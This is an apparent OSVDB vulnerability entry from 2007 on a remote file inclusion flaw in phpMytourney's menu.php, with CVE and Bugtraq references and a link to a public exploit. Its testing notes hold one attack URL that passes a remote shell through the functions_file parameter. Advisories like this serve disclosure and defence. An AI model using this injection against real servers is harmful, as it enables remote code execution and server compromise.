phpMytourney menu.php functions_file Variable Remote File Inclusion

2007-09-06T00:00:00
ID OSVDB:38331
Type osvdb
Reporter OSVDB
Modified 2007-09-06T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/menu.php?functions_file=[SHELL]

References:

ISS X-Force ID: 36495 Generic Exploit URL: http://www.milw0rm.com/exploits/4368 FrSIRT Advisory: ADV-2007-3112 CVE-2007-4757 Bugtraq ID: 25579